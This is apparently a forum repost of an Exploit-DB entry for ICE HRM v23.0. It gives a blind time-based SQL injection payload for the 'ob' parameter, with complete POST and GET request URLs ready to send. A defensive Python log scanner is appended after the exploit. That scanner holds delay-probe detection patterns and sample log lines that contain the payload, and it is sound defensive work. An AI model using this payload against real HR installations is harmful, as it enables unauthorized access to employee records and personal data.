ICE HRM 23.0 - Multiple Vulnerabilities

16-03-2019 03:58
#1
deargod
# Exploit Title: ICE HRM - 'ob' SQL Inj.
# Dork: N/A
# Date: 14-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: IceHrm – A Powerful But Simple App to Manager Your Company and Employees
# Software Link: https://sourceforge.net/projects/icehrm/
# Version: v23.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: ICE HRM is a content management system with which a company manager can control employees. It is written in PHP and JavaScript.


# POC - SQLi (blind)
# Parameters : ob
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# POST Method : http://localhost/icehrmv23OS/app/service.php


**You can also use the following by taking advantage of the same vulnerability:**

# POC - SQLi (blind)
# Parameters : ob
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# GET Method :
http://localhost/icehrmv23OS/app/dat...ationality%22:[%22Nationality%22,%22id%22,%22name%22],%22ethnicity%22:[%22Ethnicity%22,%22id%22,%22name%22],%22immigration_status%22:[%22ImmigrationStatus%22,%22id%22,%22name%22],%22employment_status%22:[%22EmploymentStatus%22,%22id%22,%22name%22],%22job_title%22:[%22JobTitle%22,%22id%22,%22name%22],%22pay_grade%22:[%22PayGrade%22,%22id%22,%22name%22],%22country%22:[%22Country%22,%22code%22,%22name%22],%22province%22:[%22Province%22,%22id%22,%22name%22],%22department%22:[%22CompanyStructure%22,%22id%22,%22title%22],%22supervisor%22:[%22Employee%22,%22id%22,%22first_name%20last_name%22]%7D&cl=[%22id%22,%22image%22,%22employee_id%22,%22first_name%22,%22last_name%22,%22mobile_phone%22,%22department%22,%22gender%22,%22supervisor%22]&ft=%7B%22status%22:%22Active%22%7D&ob=1%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f



# Exploit Link: https://www.exploit-db.com/exploits/46548
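A defensive check for the `ob` injection described in the post, as an added example that is not part of the original post or of ICE HRM's code: it scans access-log lines for `ob` values that are not a plain column name and flags time-delay probes. It assumes that `ob` is a sort-column parameter, that the log uses common log format with the request time in seconds appended, and a made-up path `/app/example.php`.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate `ob` value is one column name plus an optional direction.
SAFE_OB = re.compile(r"[A-Za-z_][A-Za-z0-9_]*( (asc|desc))?", re.IGNORECASE)
# Delay functions used by time-based probes such as the SLEEP() pattern in the post.
DELAY = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE)
# Assumed log layout: common log format with the request time (seconds) as last field.
LOG_LINE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" \d{3} \S+ (?P<secs>\d+\.\d+)$')


def classify_ob(value):
    """Classify a URL-decoded `ob` value as 'ok', 'suspicious' or 'timing-probe'."""
    value = value.strip()
    if SAFE_OB.fullmatch(value):
        return "ok"
    return "timing-probe" if DELAY.search(value) else "suspicious"


def scan(lines, slow_after=5.0):
    """Return (line_no, verdict, delayed) for every request with a non-allowlisted `ob`."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = LOG_LINE.search(line.rstrip())
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for value in params.get("ob", []):
            verdict = classify_ob(value)
            if verdict != "ok":
                # A long response time on a flagged request suggests the delay executed.
                findings.append((line_no, verdict, float(m["secs"]) >= slow_after))
    return findings


# Constructed sample lines (documentation IPs, made-up path); not taken from a real log.
SAMPLE = [
    '198.51.100.4 - - [14/Mar/2019:10:00:01 +0000] "GET /app/example.php?t=Employee&ob=first_name+desc HTTP/1.1" 200 5120 0.041',
    '203.0.113.7 - - [14/Mar/2019:10:02:10 +0000] "GET /app/example.php?t=Employee&ob=1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A)) HTTP/1.1" 200 312 25.118',
    '203.0.113.7 - - [14/Mar/2019:10:02:40 +0000] "GET /app/example.php?t=Employee&ob=id%27 HTTP/1.1" 200 312 0.030',
    '198.51.100.4 - - [14/Mar/2019:10:03:00 +0000] "GET /app/example.php?t=Employee HTTP/1.1" 200 5120 0.038',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The POST variant against `service.php` carries `ob` in the request body, which access logs do not record; `classify_ob` can be applied to the parsed body in a request filter or WAF rule instead.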

